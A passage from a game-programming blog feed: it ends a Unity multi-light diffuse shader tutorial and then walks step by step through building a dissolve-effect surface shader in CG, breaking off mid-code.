<span class="kt">float</span> <span class="n">attenuation</span> <span class="o">=</span> <span class="mf">1.0</span> <span class="o">/</span> <span class="p">(</span><span class="mf">1.0</span> <span class="o">+</span> <span class="n">unity_4LightAtten0</span><span class="p">[</span><span class="n">index</span><span class="p">]</span> <span class="o">*</span> <span class="n">squaredDistance</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">diffuseReflection</span> <span class="o">=</span> <span class="n">attenuation</span> <span class="o">*</span> <span class="n">float3</span><span class="p">(</span><span class="n">unity_LightColor</span><span class="p">[</span><span class="n">index</span><span class="p">])</span>
<span class="o">*</span> <span class="n">float3</span><span class="p">(</span><span class="n">_Color</span><span class="p">)</span> <span class="o">*</span> <span class="n">max</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="n">dot</span><span class="p">(</span><span class="n">worldN</span><span class="p">,</span> <span class="n">lightDirection</span><span class="p">));</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertexLighting</span> <span class="o">=</span> <span class="n">o</span><span class="p">.</span><span class="n">vertexLighting</span> <span class="o">+</span> <span class="n">diffuseReflection</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#endif
</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>and the ForwardBase fragment function is:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vertex_output</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">i</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">atten</span> <span class="o">=</span> <span class="n">LIGHT_ATTENUATION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">tex</span> <span class="o">*=</span> <span class="n">_Color</span> <span class="o">+</span> <span class="n">fixed4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">vertexLighting</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">normal</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="p">(</span><span class="n">UNITY_LIGHTMODEL_AMBIENT</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">tex</span><span class="p">.</span><span class="n">rgb</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="p">(</span><span class="n">tex</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">diff</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">tex</span><span class="p">.</span><span class="n">a</span> <span class="o">+</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">a</span> <span class="o">*</span> <span class="n">atten</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p><a href="http://www.kylehalladay.com/dev/code/BetterDiffuse.shader">The source for for the entire shader can be found here.</a></p>
<p>If you made it this far, congratulations! You now have a diffuse shader that takes into account all the lights unity has to offer! As always, feedback is very welcome (especially if you’ve spotted errors, or things that i’ve gotten wrong). You can find me <a href="http://twitter.com/khalladay">on Twitter.</a> Hope this tutorial helped!</p>
Making a Dissolve Effect with Surface Shaders2013-09-28T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2013/09/28/How-to-dissolve-effect<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>I recently posted a shader pack which creates a cool “dissolve” (for lack of a better descriptor) effect, similar to the skin of Skyrim’s dragons during their death animation. As requested by reddit, this post detail exactly what you need to know to write one of these shaders yourself, and hopefully, provide you with a good base with which to modify my shaders to your specific needs. I’m going to attempt to start from square one and not assume any shader experience on your part, but it will probably help if you have a general idea of how to build a basic shader before hand.</p>
<p>Let’s get started.</p>
<h2>Getting Started</h2>
<p>The obvious first step here is to open up Unity and create a new shader. Unity is going to assume that you would like to create a surface shader, and pre-populate a lot of boiler plate code. Thanks Unity! Now, delete all of it and give yourself a nice, clean slate to work with.</p>
<p>Now that that’s cleaned up, start your shader with the lines:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>This is a bit of Unity specific structure; the “Properties” section will allow us to define which variables we want to expose in the inspector, while the “SubShader” section will hold the actual code used in our shader.</p>
<p>Ok, now let’s figure out exactly what we will need the user to define. Take another look at what the effect looks like:</p>
<div align="center">
<img src="/images/post_images/2013-09-28/dissolve.png" /><br />
<font size="2">
Pretty snazzy, isn't it?
</font>
</div>
<p><br /></p>
<p>First off, we’re going to need the user to tell us what texture the put on the mesh for its normal undissolved state. The convention with Unity shaders is to call this texture _MainTex. So let’s add that to our properties.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The new line in properties shows how to define a regular texture for the inspector. We are going to call this variable _MainTex in our code, so that goes first. The “Main Texture” string in the parentheses defines that we want the inspector to display as this variables name. The subsequent “2D” declares that this slot in the inspector will accept a 2D texture. The “values after the equals sign “white”{} after the equals sign just sets the default value of this field to a generic white texture.</p>
<p>Ok, so now that we’ve figured out how to declare a texture, what other textures will we need? For this shader, we’re not going to use bump maps, so the only other texture we need is something to define the shape of the dissolve effect. Let’s call that _DissolveMap.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Ok, aside from our textures we also need 2 floats to control the progress of the effect and size of the edge lines. However, we want to be able to control the range of these floats, so that our users don’t set them to values that are outside of what makes sense for our shader. One way of doing this is with the Range type. Any variables marked as type Range in the properties panel will display as a slider, that moves between the low and high values we define.</p>
<p>Finally, I’m going to add a Color variable to allow us to define what colour the edges of the effect are.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>One thing to note is that we want the range of the dissolve effect to be functionally between 0.0 and 1.0, but in order to account for the line width, we need to expand the range in both directions by the maximum size the lines can be, otherwise lines will show up when the mesh should have no dissolve applied, and when it should be completely transparent.</p>
<p>Ok perfect, so now that that’s taken care of, let’s move on the actually writing a shader!</p>
<h2>Setting Things Up</h2>
<p>So now we move down to the SubShader tag. We’re going to be writing a surface shader. Surface shaders are a unity specific type of shorthand that takes care of all the lighting specific shader code for you. It’s perfect for our purposes. What this also decides for us is that our shader needs to be written in CG (as opposed to glsl or hlsl).</p>
<p>The first things we need to do with our shader are tell Unity to expect CG code, and what variables we want our code to access from outside of the shader itself.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Most of this is hopefully self explanatory, but the one line that may not be is the #pragma… line. This is a surface shader specific pragma that tells unity that we want our model to be lit according to the Lamber lighting model (diffuse lighting). Behind the scenes, Unity will add the code necessary for this lighting model to our shader when it compiles.</p>
<p>The other lines added are just declarations of the data we’re getting from the inspector, so that our shader knows to use this data. It’s important that the variable names used here are exactly the same as the ones we used in the Properties section. The datatypes here are just the CG equivalents of the types we defined above (there’s no such thing as a Color type in CG, so colours are representing as a 4 element vector).</p>
<p>Now, let’s add the rest of the structural code we need in order for our shader to start taking shape.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span>
<span class="p">{</span>
<span class="n">half2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="n">half2</span> <span class="n">uv_DissolveMap</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">float4</span><span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The Input struct defines what information we need to access about each vertex in the model being shaded. In this case, all we need are uv co-ordinates for each of the textures that we’re using. Defining these variables as “uv_” and then a texture name will automatically pull the correct uv’s for that texture.</p>
<p>The surface shader system will handle dealing with the position and normal variables as it needs to, but we don’t need to worry about that.</p>
<p>The surf function that I defined is just a boiler plate surface function. It takes the input we defined, and modifies a SurfaceOutput struct for Unity. This SurfaceOutput data will control what the fragment actually gets shaded as.</p>
<p>The o.Albedo line shows how to set the colour of a fragment. In this case, all we’re doing is assigning each fragment the color white. We’re going to modify this now. The next example will show how to set a fragment to the colour it should be to display _MainTex properly.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span>
<span class="p">{</span>
<span class="n">half2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="n">half2</span> <span class="n">uv_DissolveMap</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you’ve worked at all with shaders before this should make sense, we’re looking for what colour is at the position in the texture defined by the uv for this position on the mesh. o.Albedo doesn’t set the alpha of our fragment, so we use .rgb to trim the alpha from this function.</p>
<p>I’ve gone ahead and defined a clear variable (this is a 4 element vector with r g b and a set to 0.0) and grabbed the color of this position in the dissolve map texture as well.</p>
<p>Now we need to get to the good stuff, how to decide whether a given fragment should be shaded with the main texture, the line color, or the clear color.</p>
<h2>The Good Stuff</h2>
<p>We’re going to decide how to shade each fragment based on the red channel of the dissolve map. If the red value of that texture is above the value of _DissolveVal, we are going to shade that fragment with the line colour. If it is above the value of _DissolveVal + _LineWidth, the fragment will be transparent.</p>
<p>In a regular script, this would usually be done with an if/else statement, but unfortunately shaders don’t do if/else flows that well. You’ll get the correct value, but the shader will end up executing the code for every possible outcome before choosing the correct value. It’s much faster (and more shader-y) to use lerp for this. Lerp will mix two values together based on a third float value (if this value is 0, we end up with 100% of value A, if this is 1, we get 100% of value B). Hopefully this sounds like an if statement to you as well.</p>
<p>We’re going to define an integer that will serve as our conditional. The first choice we need to make is whether or not we are transparent. As stated before, we are only transparent if the red value of dissolve is greater than DissolveValue + LineWidth.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isClear</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">_LineWidth</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isAtLeastLine</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>The two ints do what their name implies. isClear resolve to 0 if dissolve.r isn’t greater than _DissolvVal + _LineWidth and isAtLeastLine will be 0 if we should use the regular texture instead of using the line color or transparency.</p>
<p>Once we have those two values, the rest is pretty straight forward.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isClear</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span> <span class="o">+</span> <span class="n">_LineWidth</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">isAtLeastLine</span> <span class="o">=</span> <span class="kt">int</span><span class="p">(</span><span class="n">dissolve</span><span class="p">.</span><span class="n">r</span> <span class="o">-</span> <span class="p">(</span><span class="n">_DissolveVal</span><span class="p">)</span> <span class="o">+</span> <span class="mf">0.99</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">altCol</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">_LineColor</span><span class="p">,</span> <span class="n">clear</span><span class="p">,</span> <span class="n">isClear</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">lerp</span><span class="p">(</span><span class="n">o</span><span class="p">.</span><span class="n">Albedo</span><span class="p">,</span> <span class="n">altCol</span><span class="p">,</span> <span class="n">isAtLeastLine</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>In case it isn’t clear, the 2 lines we just added choose whether or not the alt color is clear or the line color, and then choose whether or not we should use the main texture, or the alt color.</p>
<p>We’re almost done! If you switch over to Unity now you might notice that nothing is really going transparent, it’s just going black. This is because we haven’t yet told Unity that this will be a transparent shader. Because of the order things are rendered, you need to explicitly tell Unity when a shader will draw transparent fragments. Luckily this is a pretty simple addition to the top of the shader.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span><span class="p">{</span> <span class="s">"Queue"</span> <span class="o">=</span> <span class="s">"Transparent"</span><span class="p">}</span>
<span class="n">Blend</span> <span class="n">SrcAlpha</span> <span class="n">OneMinusSrcAlpha</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span>
<span class="p">{</span>
<span class="n">half2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="n">half2</span> <span class="n">uv_DissolveMap</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">).</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">half4</span> <span class="n">dissolve</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_DissolveMap</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_DissolveMap</span><span class="p">);</span>
<span class="n">half4</span> <span class="n">clear</span> <span class="o">=</span> <span class="n">half4</span><span class="p">(</span><span class="mf">0.0</span><span class="p">);</span>
